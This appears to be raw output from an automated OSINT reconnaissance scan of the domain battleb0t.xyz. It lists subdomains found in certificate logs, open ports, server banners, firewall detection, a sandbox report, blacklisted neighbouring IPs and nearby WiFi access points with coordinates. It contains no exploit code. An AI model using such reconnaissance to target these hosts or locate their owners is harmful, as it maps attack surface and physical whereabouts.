| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.230): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:587 | 87.248.157.102 |
| 2023-05-12 02:54:41 | Physical Location | No | Censys | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29418, United States, North America | 104.196.30.220 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Bootstrap | pics.battleb0t.xyz |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 02:58:25 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://theuselessweb.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "142.251.33.66:443"\n "142.251.215.232:443"\n "13.227.44.89:443"\n "142.251.33.98:443"\n "151.101.24.157:443"\n "142.251.211.234:443"\n "104.22.28.80:443"\n "142.250.217.99:443"\n "142.251.211.226:443"\n "142.251.215.226:443"\n "142.250.217.65:443"\n "157.240.22.35:443"\n "216.239.32.178:443"\n "31.13.70.7:443"\n "142.251.215.227:443"\n "104.244.42.136:443"\n "192.30.252.153:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "Local\\SM0:7884:304:WilStaging_02"\n "Local\\SM0:7884:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7524:304:WilStaging_02"\n "Local\\SM0:7524:120:WilError_01"\n 
"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7524:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7524:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"corndog.io"\n "ko-fi.com"\n "syndication.twitter.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"corndog.io"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007524]\n "urlref_httpstheuselessweb.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type 
"data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00007524]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007524]\n "f_00023e" has type "gzip compressed data from Unix original size modulo 2^32 327190"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007604]\n "5f8b2db9-2edb-4814-8b96-b77d0a37937f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5f8b2db9-2edb-4814-8b96-b77d0a37937f.tmp]- [targetUID: 00000000-00007524]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007524]\n "841720b3488bb430_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "gzip compressed data max compression original size modulo 2^32 156532"- [targetUID: N/A]\n "f_00023d" has type "data"- [targetUID: N/A]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7524_1677671563\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007524]\n "82f670ef-d283-42d5-9dd3-9994f8b6bb17.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\82f670ef-d283-42d5-9dd3-9994f8b6bb17.tmp]- [targetUID: 00000000-00007524]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007524]\n "Last Browser" has type "data"- [targetUID: N/A]\n "42cc4980-2299-45cd-bbba-1cbd6f9855b4.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "b5d97750-b492-4a8b-8f50-3e1d821b7085.tmp" has 
type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b5d97750-b492-4a8b-8f50-3e1d821b7085.tmp]- [targetUID: 00000000-00007524]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007524]\n "0c66e245-2f42-4c20-9b7a-29bfc70402bc.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 37080"- [targetUID: N/A]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00007524]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.fingerprint]- [targetUID: 00000000-00007524]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"syndication.twitter.com" (Indicator: "twitter")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://theuselessweb.com/"\n Pattern match: "https://theuselessweb.com"\n Heuristic match: "corndog.io"\n Pattern match: "http://corndog.io/"\n Heuristic match: "ko-fi.com"\n Heuristic match: "syndication.twitter.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', 
u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007524]'}], u'threat_level': 0, u'size': None, u'job_id': u'63977e9dae1f9c003b5ce605', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 1}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.74.170.74', u'142.251.33.66', 
u'142.251.215.232', u'13.227.44.89', u'142.251.33.98', u'151.101.24.157', u'142.251.211.234', u'104.22.28.80', u'142.250.217.99', u'142.251.211.226', u'142.251.215.226', u'142.250.217.65', u'157.240.22.35', u'216.239.32.178', u'31.13.70.7', u'142.251.215.227', u'104.244.42.136', u'192.30.252.153'], u'sha256': u'cc115afccd6fc96e7e94198d40bec095c6c | 34.74.170.74 |
| 2023-05-12 02:54:44 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04J1V5ZEHVH006E5VV5HBN1
Date: <REDACTED>
Content-Length: 0
| 35.229.48.116 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | default (Net ID: 00:0D:88:94:94:59) | 32.8608, -79.9746 |
| 2023-05-12 02:45:01 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.109.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.109.153/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7642, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94107', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.3993, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D0:D0) | 32.8608, -79.9746 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.11): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 0772ED (Net ID: 00:00:C0:07:72:ED) | 37.7813933,-122.3918002 |
| 2023-05-12 02:53:42 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["1626:5CFD:236BDF0:36406A6:645D3ABC"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683831485.544725,VS0,VE28"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["b61afadfbad522ceb47c8a79f54a7ce4c88966b0"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100102-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.109.153 |
| 2023-05-12 03:11:07 | Physical Coordinates | No | OpenStreetMap | 90 | 0 | 4 | 0 | None | 37.7813933,-122.3918002 | 101 Townsend Street, San Francisco, US-CA, US, 94107 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:8080 | 188.114.97.0/24 |
| 2023-05-12 02:53:10 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 3 | 0 | None | [{"url": "https://vscode.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://vscode.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | vscode.battleb0t.xyz |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [001328.github.io]
https://www.openphish.com/feed.txt | 001328.github.io |
| 2023-05-12 02:54:54 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3121::/48 | 2a06:98c1:3121::1 |
| 2023-05-12 02:47:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.109.153:443 | 185.199.109.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f8c5e7988238a-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:21 | Web Content Type | No | Web Spider | 0 | 0 | 5 | 0 | None | text/css | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
